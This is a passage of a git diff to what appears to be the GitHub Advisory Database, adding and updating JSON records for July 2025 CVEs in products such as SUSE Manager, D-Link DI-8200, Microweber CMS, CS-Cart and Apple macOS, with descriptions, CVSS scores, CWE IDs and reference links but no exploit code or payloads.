+ "id": "GHSA-6c9h-8vxc-74xh", + "modified": "2025-07-31T18:32:03Z", + "published": "2025-07-31T18:32:03Z", + "aliases": [ + "CVE-2025-46809" + ], + "details": "A Insertion of Sensitive Information into Log File vulnerability in SUSE Multi Linux Manager exposes the HTTP proxy credentials. This issue affects Container suse/manager/5.0/x86_64/server:5.0.5.7.30.1: from ? before 5.0.27-150600.3.33.1; Image SLES15-SP4-Manager-Server-4-3-BYOS: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-Azure: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-EC2: from ? before 4.3.87-150400.3.110.2; Image SLES15-SP4-Manager-Server-4-3-BYOS-GCE: from ? before 4.3.87-150400.3.110.2; SUSE Manager Server Module 4.3: from ? before 4.3.87-150400.3.110.2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46809" + }, + { + "type": "WEB", + "url": "https://bugzilla.suse.com/show_bug.cgi?id=CVE-2025-46809" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json b/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json new file mode 100644 index 0000000000000..884c4e0d9d9b9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6fpv-q3vm-j4gh/GHSA-6fpv-q3vm-j4gh.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6fpv-q3vm-j4gh", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-51383" + ], + "details": "D-LINK DI-8200 16.07.26A1 is vulnerable to Buffer Overflow in the ipsec_road_asp function via the host_ip parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51383" + }, + { + "type": "WEB", + "url": "https://github.com/draw-hub/zMeedA/blob/master/CVE-2025-51383.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json b/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json new file mode 100644 index 0000000000000..8e169d398374b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-75pq-m89c-9h5r/GHSA-75pq-m89c-9h5r.json @@ -0,0 +1,29 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-75pq-m89c-9h5r", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-50866" + ], + "details": "CloudClassroom-PHP-Project 1.0 contains a reflected Cross-site Scripting (XSS) vulnerability in the email parameter of the postquerypublic endpoint. Improper sanitization allows an attacker to inject arbitrary JavaScript code that executes in the context of the user s browser, potentially leading to session hijacking or phishing attacks.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50866" + }, + { + "type": "WEB", + "url": "https://github.com/SacX-7/CVE-2025-50866" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T17:15:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json b/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json new file mode 100644 index 0000000000000..c490bdf5d9afc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-782f-gxj5-xvqc/GHSA-782f-gxj5-xvqc.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-782f-gxj5-xvqc", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-51503" + ], + "details": "A Stored Cross-Site Scripting (XSS) vulnerability in Microweber CMS 2.0 allows attackers to inject malicious scripts into user profile fields, leading to arbitrary JavaScript execution in admin browsers.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51503" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51503" + }, + { + "type": "WEB", + "url": "https://github.com/progprnv/CVE-Reports/blob/main/MICROWEBER%20%5BAdmin%20Panel%5D%20Stored%20XSS%20in%20profile%20path.md" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-8c4w-j52q-j4jq/GHSA-8c4w-j52q-j4jq.json b/advisories/unreviewed/2025/07/GHSA-8c4w-j52q-j4jq/GHSA-8c4w-j52q-j4jq.json index 4b557b0fe4655..cc0a043886c6c 100644 --- a/advisories/unreviewed/2025/07/GHSA-8c4w-j52q-j4jq/GHSA-8c4w-j52q-j4jq.json +++ b/advisories/unreviewed/2025/07/GHSA-8c4w-j52q-j4jq/GHSA-8c4w-j52q-j4jq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8c4w-j52q-j4jq", - "modified": "2025-07-10T15:31:28Z", + "modified": "2025-07-31T18:31:57Z", "published": "2025-07-10T15:31:28Z", "aliases": [ "CVE-2025-7425" @@ -19,6 +19,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7425" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:12447" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2025:12450" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2025-7425" diff --git a/advisories/unreviewed/2025/07/GHSA-8wmv-6886-5g9j/GHSA-8wmv-6886-5g9j.json b/advisories/unreviewed/2025/07/GHSA-8wmv-6886-5g9j/GHSA-8wmv-6886-5g9j.json index 73ca4cac59d99..e9909213b98d5 100644 --- a/advisories/unreviewed/2025/07/GHSA-8wmv-6886-5g9j/GHSA-8wmv-6886-5g9j.json +++ b/advisories/unreviewed/2025/07/GHSA-8wmv-6886-5g9j/GHSA-8wmv-6886-5g9j.json @@ -42,7 +42,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-77" + "CWE-77", + "CWE-78" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-95cp-j893-h7c8/GHSA-95cp-j893-h7c8.json b/advisories/unreviewed/2025/07/GHSA-95cp-j893-h7c8/GHSA-95cp-j893-h7c8.json index 03e49c8777613..8a6b4633e5bc6 100644 --- a/advisories/unreviewed/2025/07/GHSA-95cp-j893-h7c8/GHSA-95cp-j893-h7c8.json +++ b/advisories/unreviewed/2025/07/GHSA-95cp-j893-h7c8/GHSA-95cp-j893-h7c8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-95cp-j893-h7c8", - "modified": "2025-07-31T00:31:05Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43229" ], "details": "This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.6. Processing maliciously crafted web content may lead to universal cross site scripting.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-96fp-5vvq-h9wg/GHSA-96fp-5vvq-h9wg.json b/advisories/unreviewed/2025/07/GHSA-96fp-5vvq-h9wg/GHSA-96fp-5vvq-h9wg.json index 79fcb0840ec7b..03c8f288e7c7b 100644 --- a/advisories/unreviewed/2025/07/GHSA-96fp-5vvq-h9wg/GHSA-96fp-5vvq-h9wg.json +++ b/advisories/unreviewed/2025/07/GHSA-96fp-5vvq-h9wg/GHSA-96fp-5vvq-h9wg.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-96fp-5vvq-h9wg", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43235" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Sequoia 15.6. An app may be able to cause a denial-of-service.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-400" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-986c-mq88-7jvv/GHSA-986c-mq88-7jvv.json b/advisories/unreviewed/2025/07/GHSA-986c-mq88-7jvv/GHSA-986c-mq88-7jvv.json index 20f47cab7d96b..e0dca4a33594f 100644 --- a/advisories/unreviewed/2025/07/GHSA-986c-mq88-7jvv/GHSA-986c-mq88-7jvv.json +++ b/advisories/unreviewed/2025/07/GHSA-986c-mq88-7jvv/GHSA-986c-mq88-7jvv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-986c-mq88-7jvv", - "modified": "2025-07-30T00:32:20Z", + "modified": "2025-07-31T18:32:00Z", "published": "2025-07-30T00:32:20Z", "aliases": [ "CVE-2025-31281" ], "details": "An input validation issue was addressed with improved memory handling. This issue is fixed in visionOS 2.6, tvOS 18.6, macOS Sequoia 15.6, iOS 18.6 and iPadOS 18.6. Processing a maliciously crafted file may lead to unexpected app termination.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-20" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:31Z" diff --git a/advisories/unreviewed/2025/07/GHSA-989f-fh5x-8jw4/GHSA-989f-fh5x-8jw4.json b/advisories/unreviewed/2025/07/GHSA-989f-fh5x-8jw4/GHSA-989f-fh5x-8jw4.json new file mode 100644 index 0000000000000..01a2dc55538dc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-989f-fh5x-8jw4/GHSA-989f-fh5x-8jw4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-989f-fh5x-8jw4", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-54834" + ], + "details": "OPEXUS FOIAXpress Public Access Link (PAL) version v11.1.0 allows an unauthenticated, remote attacker to query the /App/CreateRequest.aspx endpoint to check for the existence of valid usernames. There are no rate-limiting mechanisms in place.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-54834" + }, + { + "type": "WEB", + "url": "https://docs.opexustech.com/docs/foiaxpress/11.12.0/FOIAXpress_Release_notes_11.12.3.0.pdf" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-25-174-01.json" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-54834" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-204" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:43Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9q5r-wg62-43mc/GHSA-9q5r-wg62-43mc.json b/advisories/unreviewed/2025/07/GHSA-9q5r-wg62-43mc/GHSA-9q5r-wg62-43mc.json index 20e8b7537fac9..3de3c5d8e5b1e 100644 --- a/advisories/unreviewed/2025/07/GHSA-9q5r-wg62-43mc/GHSA-9q5r-wg62-43mc.json +++ b/advisories/unreviewed/2025/07/GHSA-9q5r-wg62-43mc/GHSA-9q5r-wg62-43mc.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json b/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json new file mode 100644 index 0000000000000..d1aaaadd9cd1c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c2ff-5p35-6q77/GHSA-c2ff-5p35-6q77.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c2ff-5p35-6q77", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-51384" + ], + "details": "D-LINK DI-8200 16.07.26A1 is vulnerable to Buffer Overflow in the ipsec_net_asp function via the remot_ip parameter.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51384" + }, + { + "type": "WEB", + "url": "https://github.com/draw-hub/zMeedA/blob/master/CVE-2025-51384.md" + }, + { + "type": "WEB", + "url": "https://www.dlink.com/en/security-bulletin" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T18:15:41Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c5c8-8x9j-g6r4/GHSA-c5c8-8x9j-g6r4.json b/advisories/unreviewed/2025/07/GHSA-c5c8-8x9j-g6r4/GHSA-c5c8-8x9j-g6r4.json index ba35f4eb8a8c3..47d3fc38e49ee 100644 --- a/advisories/unreviewed/2025/07/GHSA-c5c8-8x9j-g6r4/GHSA-c5c8-8x9j-g6r4.json +++ b/advisories/unreviewed/2025/07/GHSA-c5c8-8x9j-g6r4/GHSA-c5c8-8x9j-g6r4.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-chc2-j7q5-g527/GHSA-chc2-j7q5-g527.json b/advisories/unreviewed/2025/07/GHSA-chc2-j7q5-g527/GHSA-chc2-j7q5-g527.json index 3d1270eb7da83..c79d975f55ebb 100644 --- a/advisories/unreviewed/2025/07/GHSA-chc2-j7q5-g527/GHSA-chc2-j7q5-g527.json +++ b/advisories/unreviewed/2025/07/GHSA-chc2-j7q5-g527/GHSA-chc2-j7q5-g527.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-cqqr-8x23-33xc/GHSA-cqqr-8x23-33xc.json b/advisories/unreviewed/2025/07/GHSA-cqqr-8x23-33xc/GHSA-cqqr-8x23-33xc.json index 2fdd245923395..3c7a1b8e5bfb4 100644 --- a/advisories/unreviewed/2025/07/GHSA-cqqr-8x23-33xc/GHSA-cqqr-8x23-33xc.json +++ b/advisories/unreviewed/2025/07/GHSA-cqqr-8x23-33xc/GHSA-cqqr-8x23-33xc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cqqr-8x23-33xc", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43246" ], "details": "This issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:36Z" diff --git a/advisories/unreviewed/2025/07/GHSA-f6ch-wgf2-cc32/GHSA-f6ch-wgf2-cc32.json b/advisories/unreviewed/2025/07/GHSA-f6ch-wgf2-cc32/GHSA-f6ch-wgf2-cc32.json index e24dec0116329..5db50b9e3c47b 100644 --- a/advisories/unreviewed/2025/07/GHSA-f6ch-wgf2-cc32/GHSA-f6ch-wgf2-cc32.json +++ b/advisories/unreviewed/2025/07/GHSA-f6ch-wgf2-cc32/GHSA-f6ch-wgf2-cc32.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f6ch-wgf2-cc32", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43239" ], "details": "An out-of-bounds access issue was addressed with improved bounds checking. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7, macOS Ventura 13.7.7. Processing a maliciously crafted file may lead to unexpected app termination.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:35Z" diff --git a/advisories/unreviewed/2025/07/GHSA-g6xf-cqq5-rjpx/GHSA-g6xf-cqq5-rjpx.json b/advisories/unreviewed/2025/07/GHSA-g6xf-cqq5-rjpx/GHSA-g6xf-cqq5-rjpx.json index add1b920c6973..fd0a516eb06d4 100644 --- a/advisories/unreviewed/2025/07/GHSA-g6xf-cqq5-rjpx/GHSA-g6xf-cqq5-rjpx.json +++ b/advisories/unreviewed/2025/07/GHSA-g6xf-cqq5-rjpx/GHSA-g6xf-cqq5-rjpx.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json b/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json new file mode 100644 index 0000000000000..55d3b1d8e60a9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g74q-gh4w-3jmf/GHSA-g74q-gh4w-3jmf.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g74q-gh4w-3jmf", + "modified": "2025-07-31T18:32:04Z", + "published": "2025-07-31T18:32:04Z", + "aliases": [ + "CVE-2025-50850" + ], + "details": "An issue was discovered in CS Cart 4.18.3 allows the vendor login functionality lacks essential security controls such as CAPTCHA verification and rate limiting. This allows an attacker to systematically attempt various combinations of usernames and passwords (brute-force attack) to gain unauthorized access to vendor accounts. The absence of any blocking mechanism makes the login endpoint susceptible to automated attacks.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50850" + }, + { + "type": "WEB", + "url": "https://github.com/hackerwahab/CS-Cart-Vulns/blob/main/CVE-2025-50850.md" + }, + { + "type": "WEB", + "url": "http://cs.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T16:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g82j-g4vg-cqg3/GHSA-g82j-g4vg-cqg3.json b/advisories/unreviewed/2025/07/GHSA-g82j-g4vg-cqg3/GHSA-g82j-g4vg-cqg3.json index 7a070fc467219..55b3287384204 100644 --- a/advisories/unreviewed/2025/07/GHSA-g82j-g4vg-cqg3/GHSA-g82j-g4vg-cqg3.json +++ b/advisories/unreviewed/2025/07/GHSA-g82j-g4vg-cqg3/GHSA-g82j-g4vg-cqg3.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-g82j-g4vg-cqg3", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43256" ], "details": "This issue was addressed through improved state management. This issue is fixed in macOS Sequoia 15.6, macOS Sonoma 14.7.7. An app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:37Z" diff --git a/advisories/unreviewed/2025/07/GHSA-gcvq-jr65-5cwf/GHSA-gcvq-jr65-5cwf.json b/advisories/unreviewed/2025/07/GHSA-gcvq-jr65-5cwf/GHSA-gcvq-jr65-5cwf.json index acef55d0a1e02..a5d07c8d061a2 100644 --- a/advisories/unreviewed/2025/07/GHSA-gcvq-jr65-5cwf/GHSA-gcvq-jr65-5cwf.json +++ b/advisories/unreviewed/2025/07/GHSA-gcvq-jr65-5cwf/GHSA-gcvq-jr65-5cwf.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-gfcc-vchc-gg23/GHSA-gfcc-vchc-gg23.json b/advisories/unreviewed/2025/07/GHSA-gfcc-vchc-gg23/GHSA-gfcc-vchc-gg23.json index 8bb30c952afbd..6ca345767315d 100644 --- a/advisories/unreviewed/2025/07/GHSA-gfcc-vchc-gg23/GHSA-gfcc-vchc-gg23.json +++ b/advisories/unreviewed/2025/07/GHSA-gfcc-vchc-gg23/GHSA-gfcc-vchc-gg23.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gfcc-vchc-gg23", - "modified": "2025-07-30T00:32:22Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:22Z", "aliases": [ "CVE-2025-43222" ], "details": "A use-after-free issue was addressed by removing the vulnerable code. This issue is fixed in macOS Sequoia 15.6, iPadOS 17.7.9, macOS Ventura 13.7.7, macOS Sonoma 14.7.7. An attacker may be able to cause unexpected app termination.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-416" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:34Z" diff --git a/advisories/unreviewed/2025/07/GHSA-gg5m-q45x-623f/GHSA-gg5m-q45x-623f.json b/advisories/unreviewed/2025/07/GHSA-gg5m-q45x-623f/GHSA-gg5m-q45x-623f.json index 6c272f631da06..9e016146dcd85 100644 --- a/advisories/unreviewed/2025/07/GHSA-gg5m-q45x-623f/GHSA-gg5m-q45x-623f.json +++ b/advisories/unreviewed/2025/07/GHSA-gg5m-q45x-623f/GHSA-gg5m-q45x-623f.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-gg5m-q45x-623f", - "modified": "2025-07-30T00:32:23Z", + "modified": "2025-07-31T18:32:02Z", "published": "2025-07-30T00:32:23Z", "aliases": [ "CVE-2025-43267" ], "details": "An injection issue was addressed with improved validation. This issue is fixed in macOS Sequoia 15.6. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:38Z" diff --git a/advisories/unreviewed/2025/07/GHSA-gm3w-v4rg-3m94/GHSA-gm3w-v4rg-3m94.json b/advisories/unreviewed/2025/07/GHSA-gm3w-v4rg-3m94/GHSA-gm3w-v4rg-3m94.json index d7aed9347d29f..2562b1f88f9f3 100644 --- a/advisories/unreviewed/2025/07/GHSA-gm3w-v4rg-3m94/GHSA-gm3w-v4rg-3m94.json +++ b/advisories/unreviewed/2025/07/GHSA-gm3w-v4rg-3m94/GHSA-gm3w-v4rg-3m94.json @@ -37,7 +37,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-319" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-gp8p-9xfx-q8f8/GHSA-gp8p-9xfx-q8f8.json b/advisories/unreviewed/2025/07/GHSA-gp8p-9xfx-q8f8/GHSA-gp8p-9xfx-q8f8.json index 4590ca1f2293b..04d70040a6997 100644 --- a/advisories/unreviewed/2025/07/GHSA-gp8p-9xfx-q8f8/GHSA-gp8p-9xfx-q8f8.json +++ b/advisories/unreviewed/2025/07/GHSA-gp8p-9xfx-q8f8/GHSA-gp8p-9xfx-q8f8.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-787" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2025/07/GHSA-h29h-mrjx-j3rq/GHSA-h29h-mrjx-j3rq.json b/advisories/unreviewed/2025/07/GHSA-h29h-mrjx-j3rq/GHSA-h29h-mrjx-j3rq.json index e40f9c17ad39b..a091a6eb9c5e6 100644 --- a/advisories/unreviewed/2025/07/GHSA-h29h-mrjx-j3rq/GHSA-h29h-mrjx-j3rq.json +++ b/advisories/unreviewed/2025/07/GHSA-h29h-mrjx-j3rq/GHSA-h29h-mrjx-j3rq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-h29h-mrjx-j3rq", - "modified": "2025-07-30T00:32:21Z", + "modified": "2025-07-31T18:32:01Z", "published": "2025-07-30T00:32:21Z", "aliases": [ "CVE-2025-43215" ], "details": "The issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.6. Processing a maliciously crafted image may result in disclosure of process memory.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2025-07-30T00:15:33Z" diff --git a/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json b/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json index 410f5893b6389..63f2905be7fd3 100644 --- 